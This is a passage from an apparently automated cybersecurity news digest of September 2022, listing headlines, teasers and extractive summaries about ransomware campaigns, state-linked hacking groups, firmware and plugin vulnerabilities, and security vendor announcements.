                "

                Autosummary: All six issues are SMM memory corruption (arbitrary code execution) bugs. Binarly advisory, CVE, CVSS score: BRLY-2022-010, CVE-2022-23930, 8.2 High; BRLY-2022-011, CVE-2022-31644, 7.5 High; BRLY-2022-012, CVE-2022-31645, 8.2 High; BRLY-2022-013, CVE-2022-31646, 8.2 High; BRLY-2021-046, CVE-2022-31640, 7.5 High; BRLY-2021-047, CVE-2022-31641, 7.5 High. Three vulnerabilities were reported to HP in July 2021, while the other three issues were disclosed in April 2022. "


                Thousands of QNAP NAS devices hit by DeadBolt ransomware (CVE-2022-27593)

                exploits ransomware
                2022-09-12 https://www.helpnetsecurity.com/2022/09/12/cve-2022-27593/

                QNAP Systems has provided more information about the latest DeadBolt ransomware campaign targeting users of its network-attached storage (NAS) devices and the vulnerability the attackers are exploiting (CVE-2022-27593). About CVE-2022-27593: CVE-2022-27593 exists because of an externally controlled reference that resolves to a resource that is outside of the intended control sphere, and affects the widely used Photo Station application. The vulnerability allows attackers to modify system files and, ultimately, install and deploy ransomware. According to … More

                The post Thousands of QNAP NAS devices hit by DeadBolt ransomware (CVE-2022-27593) appeared first on Help Net Security.

                "

                Autosummary: “No public exploit code exists, although this write up will introduce, what we believe to be, the basis of the exploit,” he wrote, and noted that the published information is likely enough to write signatures and detections against its exploitation. "


                Palestinian Hacktivist Group GhostSec Compromises 55 Berghof PLCs Across Israel

                industry
                2022-09-12 https://thehackernews.com/2022/09/palestinian-hacktivist-group-ghostsec.html
                A hacktivist collective called GhostSec has claimed credit for compromising as many as 55 Berghof programmable logic controllers (PLCs) used by Israeli organizations as part of a "Free Palestine" campaign. Industrial cybersecurity firm OTORIO, which dug deeper into the incident, said the breach was made possible owing to the fact that the PLCs were accessible through the Internet and were "

                Autosummary: The attacks against Israeli targets, dubbed "#OpIsrael," are said to have commenced on June 28, 2022, citing "continuous attacks from Israel towards Palestinians. "


                Why Vulnerability Scanning is Critical for SOC 2

                exploits
                2022-09-12 https://thehackernews.com/2022/09/why-vulnerability-scanning-is-critical.html
                SOC 2 may be a voluntary standard, but for today's security-conscious business, it's a minimal requirement when considering a SaaS provider. Compliance can be a long and complicated process, but a scanner like Intruder makes it easy to tick the vulnerability management box. Security is critical for all organisations, including those that outsource key business operations to third parties like "

                Autosummary: Developed by the American Institute of CPAs (AICPA), SOC 2 requires compliance for managing customer data based on five criteria or "trust service principles" - security, availability, processing integrity, confidentiality and privacy. If your business is trying to secure new investment, going through a merger, or being acquired by another business, due diligence will include your security posture, how you handle data, and your exposure to risk and threats. SOC 2-compliant organisations can use this to prove to customers that they're committed to information security, which in turn can create new business opportunities, because the framework states that compliant organisations can only share data with other organisations that have passed the audit. "


                Cisco confirms that data leaked by the Yanluowang ransomware gang were stolen from its systems

                exploits ransomware
                2022-09-12 https://securityaffairs.co/wordpress/135625/cyber-crime/cisco-hack-yanluowang-ransomware.html

                Cisco confirmed the May attack and that the data leaked by the Yanluowang ransomware group was stolen from its systems. In August, Cisco disclosed a security breach: the Yanluowang ransomware gang breached its corporate network in late May and stole internal data. The investigation conducted by Cisco Security Incident Response (CSIRT) and Cisco Talos revealed […]

                The post Cisco confirms that data leaked by the Yanluowang ransomware gang were stolen from its systems appeared first on Security Affairs.

                "

                Autosummary: The threat actors were then able to drop multiple tools in the target network, including remote access tools like LogMeIn and TeamViewer, Cobalt Strike, PowerSploit, Mimikatz, and Impacket. "


                Lorenz ransomware breaches corporate network via phone systems

                exploits ransomware
                2022-09-12 https://www.bleepingcomputer.com/news/security/lorenz-ransomware-breaches-corporate-network-via-phone-systems/
                The Lorenz ransomware gang now uses a critical vulnerability in Mitel MiVoice VOIP appliances to breach enterprises using their phone systems for initial access to their corporate networks. [...] "

                Autosummary: This is an important addition to the gang's arsenal, given that Mitel Voice-over-IP (VoIP) products are used by organizations in critical sectors worldwide (including government agencies), with over 19,000 devices currently exposed to attacks over the Internet, per security expert Kevin Beaumont. "


                U-Haul discloses data breach exposing customer driver licenses

                financial
                2022-09-12 https://www.bleepingcomputer.com/news/security/u-haul-discloses-data-breach-exposing-customer-driver-licenses/
                Moving and storage giant U-Haul International (U-Haul) disclosed a data breach after a customer contract search tool was hacked to access customers' names and driver's license information. [...] "

                Autosummary: "


                Apple fixes eighth zero-day used to hack iPhones and Macs this year

                exploits
                2022-09-12 https://www.bleepingcomputer.com/news/security/apple-fixes-eighth-zero-day-used-to-hack-iphones-and-macs-this-year/
                Apple has released security updates to address the eighth zero-day vulnerability used in attacks against iPhones and Macs since the start of the year. [...] "

                Autosummary: "


                Apple fixed the eighth actively exploited zero-day this year

                exploits
                2022-09-12 https://securityaffairs.co/wordpress/135647/security/apple-fixes-eighth-zero-day.html

                Apple has addressed the eighth zero-day vulnerability that is actively exploited in attacks against iPhones and Macs since January. Apple has released security updates to fix a zero-day vulnerability, tracked as CVE-2022-32917, which is actively exploited in attacks against iPhone and Mac devices. This is the eighth zero-day vulnerability fixed by the IT giant since […]

                The post Apple fixed the eighth actively exploited zero-day this year appeared first on Security Affairs.

                "

                Autosummary: Apple addressed seven other zero-days since the start of the year. Apple has addressed six other zero-day vulnerabilities since January; below is the list of fixed issues: "


                IKOULA and ESET join forces to block ransomware and zero-day threats

                exploits ransomware
                2022-09-12 https://www.helpnetsecurity.com/2022/09/13/ikoula-eset/

                With the resurgence of cyber-attacks, which are ever more violent and paralyzing for companies, IKOULA has joined forces with ESET to offer companies a professional endpoint protection solution against ransomware and zero-day threats. At a time when cyber-risks must be approached in the same way as all other business risks, IKOULA is strengthening its range of cyber-protection solutions, and now offers its customers the ESET solution: a solution created to protect all of a company’s workstations … More

                The post IKOULA and ESET join forces to block ransomware and zero-day threats appeared first on Help Net Security.

                "

                Autosummary: "


                Firmware bugs in many HP computer models left unfixed for over a year

                exploits
                2022-09-11 https://www.bleepingcomputer.com/news/security/firmware-bugs-in-many-hp-computer-models-left-unfixed-for-over-a-year/
                A set of six high-severity firmware vulnerabilities impacting a broad range of HP Enterprise devices is still waiting to be patched, although some of them have been publicly disclosed since July 2021. [...] "

                Autosummary: However, many business notebook PCs (Elite, Zbook, ProBook), business desktop PCs (ProDesk, EliteDesk, ProOne), point of sale systems, and also HP workstations (Z1, Z2, Z4, Zcentral) have not received patches yet (check advisory for details). "


                Albania was hit by a new cyberattack and blames Iran

                ciber
                2022-09-11 https://securityaffairs.co/wordpress/135602/cyber-warfare-2/albania-second-cyber-attack.html

                Albania blamed Iran for a new cyberattack that hit computer systems used by the state police on Friday. Albania blamed the government of Teheran for a new cyberattack that hit computer systems used by the state police on Saturday. “The national police’s computer systems were hit Friday by a cyberattack which, according to initial information, […]

                The post Albania was hit by a new cyberattack and blames Iran appeared first on Security Affairs.

                "

                Autosummary: “The national police’s computer systems were hit Friday by a cyberattack which, according to initial information, was committed by the same actors who in July attacked the country’s public and government service systems,” reads a statement issued by the Albanian interior ministry. “In order to neutralize the criminal act and secure the systems,” the authorities have shut down computer control systems at seaports, airports and border posts, the statement added. "


                U.S. Imposes New Sanctions on Iran Over Cyberattack on Albania

                ciber
                2022-09-10 https://thehackernews.com/2022/09/us-imposes-new-sanctions-on-iran-over.html
                The U.S. Treasury Department on Friday announced sanctions against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies. "Since at least 2007, the MOIS and its cyber actor proxies have conducted malicious cyber operations targeting a range of government and private-sector "

                Autosummary: Microsoft, which investigated the attacks, said the adversaries worked in tandem to carry out distinct phases of the attacks, with each cluster responsible for a different aspect of the operation: DEV-0842 deployed the ransomware and wiper malware; DEV-0861 gained initial access and exfiltrated data; DEV-0166 (aka IntrudingDivisor) exfiltrated data; and DEV-0133 (aka Lyceum or Siamese Kitten) probed victim infrastructure. The tech giant's threat intelligence teams also attributed the groups involved in gaining initial access and exfiltrating data to the Iranian MOIS-linked hacking collective codenamed Europium, which is also known as APT34, Cobalt Gypsy, Helix Kitten, or OilRig. "


                Scammers live-streamed on YouTube a fake Apple crypto event

                financial
                2022-09-10 https://securityaffairs.co/wordpress/135549/cyber-crime/fake-apple-crypto-event-youtube.html

                Scammers live-streamed on YouTube an old interview with Tim Cook as part of a fake Apple crypto event, and tens of thousands of users viewed it. Cybercriminals were live-streaming on YouTube an old interview with Tim Cook as part of a fake Apple crypto event, and tens of thousands of users viewed it. The interview […]

                The post Scammers live-streamed on YouTube a fake Apple crypto event appeared first on Security Affairs.

                "

                Autosummary: “When I first started watching the fake stream, there were around 16K viewers, and right before first publishing this story, that count was nearly 70K.” The Verge also reported having found another live stream on a separate channel, the stream was advertised as an event featuring Cook and Elon Musk about Apple and the metaverse. "


                IHG suffered a cyberattack that severely impacted its booking process

                ciber
                2022-09-10 https://securityaffairs.co/wordpress/135572/hacking/ihg-suffered-cyberattack.html

                InterContinental Hotels Group PLC (IHG) discloses a security breach: parts of its IT infrastructure have been subject to unauthorised activity. The hospitality conglomerate InterContinental Hotel Group (IHG) manages 17 hotel chains, including the Regent, Crowne Plaza, Holiday Inn, and Candlewood Suites. IHG operates 6,028 hotels in more than 100 different countries. The company announced that […]

                The post IHG suffered a cyberattack that severely impacted its booking process appeared first on Security Affairs.

                "

                Autosummary: "


                China-Linked BRONZE PRESIDENT APT targets Government officials worldwide

                government
                2022-09-10 https://securityaffairs.co/wordpress/135557/apt/bronze-president-plugx-malware.html

                China-linked BRONZE PRESIDENT group is targeting government officials in Europe, the Middle East, and South America with PlugX malware. Secureworks researchers reported that China-linked APT group BRONZE PRESIDENT conducted a new campaign aimed at government officials in Europe, the Middle East, and South America with the PlugX malware. Attacks part of this campaign were spotted […]

                The post China-Linked BRONZE PRESIDENT APT targets Government officials worldwide appeared first on Security Affairs.

                "

                Autosummary: “Several characteristics of this campaign indicate that it was conducted by the likely Chinese government-sponsored BRONZE PRESIDENT threat group, including the use of PlugX, file paths and naming schemes previously used by the threat group, the presence of shellcode in executable file headers, and politically-themed decoy documents that align with regions where China has interests.” reads the analysis published by Secureworks. "


                CyberLink and MediaTek join forces to provide AI solution for facial recognition AIoT apps

                industry
                2022-09-10 https://www.helpnetsecurity.com/2022/09/11/cyberlink-mediatek/

                CyberLink has integrated its AI facial recognition engine, FaceMe, into MediaTek’s new AIoT platform, Genio. The pairing of FaceMe’s engine with the Genio platform gives the market an AI solution for facial recognition AIoT applications. Edge computing for facial recognition with low latency: CyberLink’s cross-platform AI facial recognition engine, FaceMe, already supports numerous operating systems and is optimized for IoT and AIoT platforms. With the recent integration with MediaTek’s Genio 1200, FaceMe further provides IoT/AIoT developers … More

                The post CyberLink and MediaTek join forces to provide AI solution for facial recognition AIoT apps appeared first on Help Net Security.

                "

                Autosummary: "


                Ransomware gangs switching to new intermittent encryption tactic

                exploits
                2022-09-10 https://www.bleepingcomputer.com/news/security/ransomware-gangs-switching-to-new-intermittent-encryption-tactic/
                A growing number of ransomware groups are adopting a new tactic that helps them encrypt their victims' systems faster while reducing the chances of being detected and stopped. [...] "

                Autosummary: PLAY doesn't give configuration options, but instead, it just breaks the file into 2, 3, or 5 chunks, depending on the file size, and then encrypts every other chunk. "


                Better than a fix: Tightening backup and restore helps financial services companies innovate

                financial
                2022-09-09 https://www.helpnetsecurity.com/2022/09/09/financial-services-data-protection/

                We all know the risks out there. Ransomware is a huge threat, and critical transactional data is constantly under attack. Meanwhile, financial services organizations are being squeezed on all sides, as regulators are tightening legislation, from SOX to CCPA, GDPR and global data privacy laws like PIPL. In this firestorm, it’s never been more important for financial services organizations to level up their data protection and risk mitigation strategies. What makes financial services data so … More

                The post Better than a fix: Tightening backup and restore helps financial services companies innovate appeared first on Help Net Security.

                "

                Autosummary: Amongst the financial services organizations that were hit, 52% paid the ransom to restore data, which is higher than the global average of 46%, and the survey found that the average remediation cost in financial services was US$1.59M, which is above the global average of US$1.4M. Response rates are too slow. It follows that securing this data is a huge challenge that requires ever-shifting innovations. Sophisticated data models. Strict security requirements. Extremely large data volumes. Testing environments can introduce risk. Financial services under attack. Threats to data come from many places, from human error to malicious activity, and one such threat is ransomware attacks. 2. Have a clear archiving strategy, which applies coherent rules that control which data stays in the platform, which moves off-platform, and what gets deleted, all in keeping with your business needs and industry regulation. "


                OneSpan and BankID expand digital identity protection to allow cross-border authentication with e-ID

                financial
                2022-09-09 https://www.helpnetsecurity.com/2022/09/09/onespan-cloud-authentication-bankid/

                OneSpan has expanded its OneSpan Cloud Authentication service with BankID. BankID first launched with OneSpan in September 2021 and has already reached a multi-million user milestone that is expected to continue growing as BankID’s technology adoption increases. This expanded partnership further solidifies the crucial role BankID has entrusted to OneSpan to provide security and meet compliance standards within the Norwegian critical national infrastructure. Issued through more than 90 banks and 9,000 merchants, including tax authorities, … More

                The post OneSpan and BankID expand digital identity protection to allow cross-border authentication with e-ID appeared first on Help Net Security.

                "

                Autosummary: “The world needs security-infused workflows native to digital experiences, like BankID’s solution, that preserve and enhance the customer experience and guarantee the integrity of people, data, transactions, and documentation,” said OneSpan President and CEO, Matthew Moynahan. "


                Cybercriminals are changing focus from large hospitals to smaller hospital systems

                ciber
                2022-09-09 https://www.helpnetsecurity.com/2022/09/09/healthcare-data-breach-video/

                Critical Insight announced the release of the firm’s H1 2022 Healthcare Data Breach Report, which analyzes breach data reported to the United States Department of Health and Human Services by healthcare organizations. This Help Net Security video reveals why attackers are changing targets and moving from large hospitals to smaller hospital systems.

                The post Cybercriminals are changing focus from large hospitals to smaller hospital systems appeared first on Help Net Security.

                "

                Autosummary: "


                High-risk ConnectWise Automate vulnerability fixed, admins urged to patch ASAP

                exploits
                2022-09-09 https://www.helpnetsecurity.com/2022/09/09/connectwise-automate-vulnerability/

                ConnectWise has fixed a vulnerability in ConnectWise Automate, a popular remote monitoring and management tool, which could allow attackers to compromise confidential data or other processing resources. The severity of the vulnerability is merely “important”, as its exploitation requires additional access and/or privilege, but ConnectWise recommends that administrators of on-premise instances patch as soon as possible. The company did not actually say that the vulnerability is being exploited in the wild, but categorizes the priority … More

                The post High-risk ConnectWise Automate vulnerability fixed, admins urged to patch ASAP appeared first on Help Net Security.

                "

                Autosummary: "


                Hackers Exploit Zero-Day in WordPress BackupBuddy Plugin in ~5 Million Attempts

                exploits
                2022-09-09 https://thehackernews.com/2022/09/hackers-exploit-zero-day-in-wordpress.html
                A zero-day flaw in a WordPress plugin called BackupBuddy is being actively exploited, WordPress security company Wordfence has disclosed. "This vulnerability makes it possible for unauthenticated users to download arbitrary files from the affected site which can include sensitive information," it said. BackupBuddy allows users to back up their entire WordPress installation from within the "

                Autosummary: "


                Experts warn of attacks exploiting zero-day in WordPress BackupBuddy plugin

                exploits
                2022-09-09 https://securityaffairs.co/wordpress/135518/hacking/backupbuddy-wordpress-zero-day.html

                Threat actors are exploiting a zero-day vulnerability in a WordPress plugin called BackupBuddy, Wordfence researchers warned. On September 6, 2022, the Wordfence Threat Intelligence team was informed of a vulnerability being actively exploited in the BackupBuddy WordPress plugin. This plugin allows users to back up an entire WordPress installation, including theme files, pages, posts, widgets, users, and […]

                The post Experts warn of attacks exploiting zero-day in WordPress BackupBuddy plugin appeared first on Security Affairs.

                "

                Autosummary: This plugin allows users to back up an entire WordPress installation, including theme files, pages, posts, widgets, users, and media files. "


                Vice Society claims LAUSD ransomware attack, theft of 500GB of data

                exploits ransomware
                2022-09-09 https://www.bleepingcomputer.com/news/security/vice-society-claims-lausd-ransomware-attack-theft-of-500gb-of-data/
                The Vice Society gang has claimed the ransomware attack that hit Los Angeles Unified (LAUSD), the second largest school district in the United States, over the weekend. [...] "

                Autosummary: The gang has claimed attacks on other school districts, schools, and universities worldwide, including the Austrian Medical University of Innsbruck, the San Luis Coastal Unified School District, the Moon Area School District, the Grand Valley State University, and many others. "


                Lampion malware returns in phishing attacks abusing WeTransfer

                financial exploits
                2022-09-09 https://www.bleepingcomputer.com/news/security/lampion-malware-returns-in-phishing-attacks-abusing-wetransfer/
                The Lampion malware is being distributed in greater volumes lately, with threat actors abusing WeTransfer as part of their phishing campaigns. [...] "

                Autosummary: More recently, in March 2022, Cyware reported an uptick in the trojan's distribution, identifying a hostname link to Bazaar and LockBit operations. "


                The Week in Ransomware - September 9th 2022 - Schools under fire

                exploits ransomware
                2022-09-09 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-9th-2022-schools-under-fire/
                Ransomware gangs have been busy this week, launching attacks against NAS devices, one of the largest hotel groups, IHG, and LAUSD, the second largest school district in the USA. [...] "

                Autosummary: We also saw some new ransomware research released this week. Contributors and those who provided new ransomware information and stories this week include: @malwareforme, @LawrenceAbrams, @FourOctets, @Ionut_Ilascu, @serghei, @billtoulas, @fwosar, @VK_Intel, @struppigel, @BleepinComputer, @malwrhunterteam, @Seifreed, @DanielGallagher, @demonslay335, @jorntvdw, @PolarToffee, @MsftSecIntel, @CISAgov, @FBI, @pmbureau, @AdvIntel, @pcrisk, @PogoWasRight, @cPeterr, @security_score, and @Intel471Inc. "


                US sanctions Iran’s Ministry of Intelligence over Albania cyberattack

                ciber
                2022-09-09 https://www.bleepingcomputer.com/news/security/us-sanctions-iran-s-ministry-of-intelligence-over-albania-cyberattack/
                The U.S. Treasury Department announced sanctions today against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence for their role in the July cyberattack against the government of Albania, a U.S. ally and a NATO member state. [...] "

                Autosummary: https://t.co/JoH2cEqNzp — Jens Stoltenberg (@jensstoltenberg) September 8, 2022. MOIS-controlled threat groups: Earlier this year, U.S. Cyber Command (USCYBERCOM) officially linked the Iranian-backed MuddyWater threat group to Iran's Ministry of Intelligence and Security (MOIS). "


                US Treasury sanctioned Iran’s Ministry of Intelligence over Albania cyberattack

                ciber
                2022-09-09 https://securityaffairs.co/wordpress/135532/intelligence/us-treasury-sanctioned-iran.html

                The U.S. Treasury Department sanctioned Iran’s Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence over the Albania cyberattack. The U.S. Treasury Department announced sanctions against Iran’s Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence over the cyber attack that hit Albania in July. MOIS is the primary intelligence […]

                The post US Treasury sanctioned Iran’s Ministry of Intelligence over Albania cyberattack appeared first on Security Affairs.

                "



                The top apps for malware downloads

                exploits
                2022-09-08 https://www.helpnetsecurity.com/2022/09/08/top-apps-malware-downloads-video/

                In July 2022, one third of all malware downloads came from cloud apps. The overwhelming majority of the downloads were trojans, a type of malware that is disguised as legitimate software. If you were to download and run a trojan, you would typically end up infected with other malware such as info stealers, backdoors or ransomware. Attackers are successful using cloud apps to deliver malware because cloud apps are so popular. In this video for … More

                The post The top apps for malware downloads appeared first on Help Net Security.

                "

                Autosummary: "


                Nation-state attacks are a growing threat to video conferencing

                government
                2022-09-08 https://www.helpnetsecurity.com/2022/09/08/video-conferencing-cyber-threats/

                Zerify announced the findings of a survey that indicate that IT professionals are becoming increasingly concerned about the growing number of cyber threats and foreign attacks capable of impacting video conferencing. The survey, executed by Propeller Insights in July of 2022, involved 1,000 IT professionals – most of whom are at the director or C-Level (83.8%). With the White House’s executive order on improving the nation’s cybersecurity, video conferencing still has not been given the … More

                The post Nation-state attacks are a growing threat to video conferencing appeared first on Help Net Security.

                "

                Autosummary: Nation-state cyber threats have increased at most (81.8%) companies; 89% of IT professionals are concerned about foreign attacks as they see a rise in threats; 79% of respondents reported that they were very knowledgeable about the concept and framework of zero trust cybersecurity, with 86% stating that their company had zero trust cybersecurity policies. "


                Microsoft Warns of Ransomware Attacks by Iranian Phosphorus Hacker Group

                exploits ransomware
                2022-09-08 https://thehackernews.com/2022/09/microsoft-warns-of-ransomware-attacks.html
                Microsoft's threat intelligence division on Wednesday assessed that a subgroup of the Iranian threat actor tracked as Phosphorus is conducting ransomware attacks as a "form of moonlighting" for personal gain. The tech giant, which is monitoring the activity cluster under the moniker DEV-0270 (aka Nemesis Kitten), said it's operated by a company that functions under the public aliases Secnerd and "

                Autosummary: "


                Chinese Hackers Target Government Officials in Europe, South America and Middle East

                government
                2022-09-08 https://thehackernews.com/2022/09/chinese-hackers-target-government.html
                A Chinese hacking group has been attributed to a new campaign aimed at infecting government officials in Europe, the Middle East, and South America with a modular malware known as PlugX. Cybersecurity firm Secureworks said it identified the intrusions in June and July 2022, once again demonstrating the adversary's continued focus on espionage against governments around the world. "PlugX is "

                Autosummary: "


                Hackers Repeatedly Targeting Financial Services in French-Speaking African Countries

                financial
                2022-09-08 https://thehackernews.com/2022/09/hackers-repeatedly-targeting-financial.html
                Major financial and insurance companies located in French-speaking nations in Africa have been targeted over the past two years as part of a persistent malicious campaign codenamed DangerousSavanna. Countries targeted include Ivory Coast, Morocco, Cameroon, Senegal, and Togo, with the spear-phishing attacks heavily focusing on Ivory Coast in recent months, Israeli cybersecurity firm Check Point "

                Autosummary: "


                Ex-members of the Conti ransomware gang target Ukraine

                exploits ransomware
                2022-09-08 https://securityaffairs.co/wordpress/135447/cyber-crime/conti-ransomware-members-target-ukraine.html

                Some members of the Conti ransomware gang were involved in financially motivated attacks targeting Ukraine from April to August 2022. Researchers from Google’s Threat Analysis Group (TAG) reported that some former members of the Conti cybercrime group were involved in five different campaigns targeting Ukraine between April and August 2022. The activities overlap with operations […]

                The post Ex-members of the Conti ransomware gang target Ukraine appeared first on Security Affairs.

                "

                Autosummary: “UAC-0098 activities are representative examples of blurring lines between financially motivated and government backed groups in Eastern Europe, illustrating a trend of threat actors changing their targeting to align with regional geopolitical interests.” concludes TAG. "


                North Korean Lazarus hackers take aim at U.S. energy providers

                industry
                2022-09-08 https://www.bleepingcomputer.com/news/security/north-korean-lazarus-hackers-take-aim-at-us-energy-providers/
                The North Korean APT group "Lazarus" (APT38) is exploiting VMware Horizon servers to access the corporate networks of energy providers in the United States, Canada, and Japan. [...] "

                Autosummary: This diversification in attacks is illustrated in the Lazarus hackers' wide range of attacks, including their targeting of IT job seekers, the creation of fake cryptocurrency trading apps, the creation of trojanized development tools, the use of ransomware as decoys, and the massive $620 million theft of cryptocurrency from the Ronin bridge. "


                Warning issued about Vice Society ransomware gang after attacks on schools

                exploits ransomware
                2022-09-08 https://www.tripwire.com/state-of-security/security-data-protection/warning-issued-vice-society-ransomware-gang/
                A ransomware gang that has been increasingly disproportionately targeting the education sector is the subject of a joint warning issued by the FBI, CISA, and MS-ISAC. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: As well as strongly discouraging victims from paying any ransom to Vice Society, the FBI is also urging victims to share information that might help disrupt or even dismantle the criminal group: “The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Vice Society actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.” "


                North Korean Lazarus Hackers Targeting Energy Providers Around the World

                industry
                2022-09-08 https://thehackernews.com/2022/09/north-korean-lazarus-hackers-targeting.html
                A malicious campaign mounted by the North Korea-linked Lazarus Group is targeting energy providers around the world, including those based in the United States, Canada, and Japan. “The campaign is meant to infiltrate organizations around the world for establishing long-term access and subsequently exfiltrating data of interest to the adversary’s nation-state,” Cisco Talos said in a report shared "

                Autosummary: "


                North Korea-linked Lazarus APT targets energy providers around the world

                industry
                2022-09-08 https://securityaffairs.co/wordpress/135469/apt/north-korea-linked-lazarus-apt-targets-energy-providers-around-the-world.html

                North Korea-linked Lazarus APT group is targeting energy providers around the world, including organizations in the US, Canada, and Japan. Talos researchers tracked a campaign, orchestrated by North Korea-linked Lazarus APT group, aimed at energy providers around the world, including organizations in the US, Canada, and Japan. The campaign was observed between February and July 2022.  The attacks […]

                The post North Korea-linked Lazarus APT targets energy providers around the world appeared first on Security Affairs.

                "

                Autosummary: Talos researchers tracked a campaign, orchestrated by North Korea-linked Lazarus APT group, aimed at energy providers around the world, including organizations in the US, Canada, and Japan. "


                Bumblebee malware adds post-exploitation tool for stealthy infections

                exploits
                2022-09-08 https://www.bleepingcomputer.com/news/security/bumblebee-malware-adds-post-exploitation-tool-for-stealthy-infections/
                A new version of the Bumblebee malware loader has been spotted in the wild, featuring a new infection chain that uses the PowerSploit framework for stealthy reflective injection of a DLL payload into memory. [...] "

                Autosummary: "


                InterContinental Hotels' booking systems disrupted by cyberattack

                ciber
                2022-09-08 https://www.malwarebytes.com/blog/news/2022/09/intercontinental-hotels-booking-systems-disrupted-by-cyberattack

                Categories: News

                InterContinental Hotels Group PLC reports that parts of the company's technology systems have been subject to unauthorized activity. Ransomware?


                The post InterContinental Hotels' booking systems disrupted by cyberattack appeared first on Malwarebytes Labs.

                "

                Autosummary: InterContinental Hotels Group: The InterContinental Hotels Group, also known as IHG Hotels & Resorts, operates 17 hotel brands around the world, including established brands like InterContinental, Regent, Six Senses, Crowne Plaza, and Holiday Inn. Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud). "


                Ransomware review: August 2022

                exploits
                2022-09-08 https://www.malwarebytes.com/blog/threat-intelligence/2022/09/ransomware-review-august-2022

                Categories: Threat Intelligence

                LockBit remained the dominant ransomware variant in August, as it has all year. At the other end of the scale, REvil's revival in slow motion continued with a single victim listed.


                The post Ransomware review: August 2022 appeared first on Malwarebytes Labs.

                "

                Autosummary: Known ransomware attacks by country, August 2022. Known ransomware attacks by industry sector, August 2022. The future of ransomware: Two events in August hinted at how ransomware gangs' tactics may evolve beyond "double extortion", the biggest innovation in ransomware tactics in recent years. Known ransomware attacks by gang, August 2022. As we wrote in June, part of LockBit's success comes from avoiding the kind of fatal missteps made by rivals like Conti, REvil, and DarkSide, all of whom attracted a great deal of public attention from US law enforcement. Known ransomware attacks by gang, between March 2022 and August 2022. The USA continues to bear the brunt of ransomware attacks, although its preeminence likely reflects the size of its service economy and the large number of potential victims rather than deliberate targeting. "


                Vulnerability response for SMBs: The Malwarebytes approach

                exploits
                2022-09-08 https://www.malwarebytes.com/blog/business/2022/09/vulnerability-response-for-smbs-the-malwarebytes-approach

                Categories: Business

                At Malwarebytes, we understand that small-and-medium sized businesses find it uniquely difficult to quickly respond to vulnerabilities. In this post, learn more about our approach to vulnerability response and how our Vulnerability Assessment and Patch Management solutions can address common SMB pain points.


                The post Vulnerability response for SMBs: The Malwarebytes approach appeared first on Malwarebytes Labs.

                "

                Autosummary: Intuitive: With Malwarebytes Vulnerability Assessment, IT teams can easily identify, classify and prioritize vulnerabilities in drivers, applications, macOS, and Windows server and desktop operating systems (OSes). Watch the demos: Vulnerability Assessment; Patch Management. More resources: What is patch management? Our VPM is built on the cloud-based Nebula security platform, making it easy to manage all your Malwarebytes solutions from a single platform: Malwarebytes Incident Response (IR), Endpoint Protection (EP), and Endpoint Detection and Response (EDR). The Nebula security platform provides an intuitive guided user interface; next-generation threat intelligence; multi-layered security, including industry leading remediation; and easy integration with SIEM, SOAR, and ITSM solutions to simplify detection and response and resolve IT tickets with ease. Intuitive, effective, and inclusive vulnerability response for SMBs: A combination of factors is responsible for SMBs not doing timely patching, but it can mainly be chalked up to a lack of automation and dedicated IT patching staff. "


                Toys behaving badly: How parents can protect their family from IoT threats

                industry
                2022-09-08 https://www.welivesecurity.com/2022/09/08/toys-behaving-badly-how-parents-protect-family-iot-threats/

                It pays to do some research before taking a leap into the world of internet-connected toys

                The post Toys behaving badly: How parents can protect their family from IoT threats appeared first on WeLiveSecurity

                "

                Autosummary: This could include features like: microphones and cameras that receive video and audio from the child; speakers and screens to relay audio and video back to the child; Bluetooth to link the toy up to a connected app; internet connectivity to the home Wi-Fi router. With this kind of technology, smart toys can go beyond the inanimate playthings most of us grew up with. How to mitigate the privacy and security risks of smart toys: With smart toys representing a certain degree of security and privacy risks, consider the following best practice advice to counter the threats. Do your research before buying: Check if there’s been negative publicity or research done on the model’s security and privacy credentials. Attackers could theoretically hijack a smart toy with audio capabilities to hack smart homes, by sending audio commands to a voice-activated system (i.e., “Alexa, open the front door”). "


                CISA adds 12 new flaws to its Known Exploited Vulnerabilities Catalog

                exploits
                2022-09-08 https://securityaffairs.co/wordpress/135491/security/cisa-known-exploited-vulnerabilities-catalog-flaws-2.html

                CISA added 12 more security flaws to its Known Exploited Vulnerabilities Catalog including four D-Link vulnerabilities. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 12 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, including four vulnerabilities in D-Link routers, two Chrome zero-day issues, and a recently disclosed flaw in the QNAP Photo Station. According to Binding Operational […]

                The post CISA adds 12 new flaws to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: "


                7 free online cybersecurity courses you can take right now

                ciber
                2022-09-07 https://www.helpnetsecurity.com/2022/09/07/7-free-online-cybersecurity-courses-you-can-take-right-now/

                The cybersecurity skills shortage continues to present multiple challenges and have repercussions for organizations. The skills gap can be addressed through training and certifications to increase employees’ education. The talent shortage and a variety of specialized fields within cybersecurity have inspired many to reskill and join the industry. One way to get more knowledge is to take advantage of online learning opportunities. Below you can find a list of free online cybersecurity courses that can … More

                The post 7 free online cybersecurity courses you can take right now appeared first on Help Net Security.

                "

                Autosummary: Security Governance & Compliance (University of California, Irvine; Instructor: Jacob Horne, Cybersecurity Consultant): In this course, students are introduced to the field of cyber security with a focus on the domain of security & risk management. Web Security Fundamentals (KU Leuven University; Instructor: Philippe De Ryck, Founder, Pragmatic Web Security): This course provides an overview of the most common attacks, and illustrates fundamental countermeasures that every web application should implement. "


                eBook: 4 cybersecurity trends to watch in 2022

                ciber
                2022-09-07 https://www.helpnetsecurity.com/2022/09/07/ebook-4-cybersecurity-trends-to-watch-in-2022/

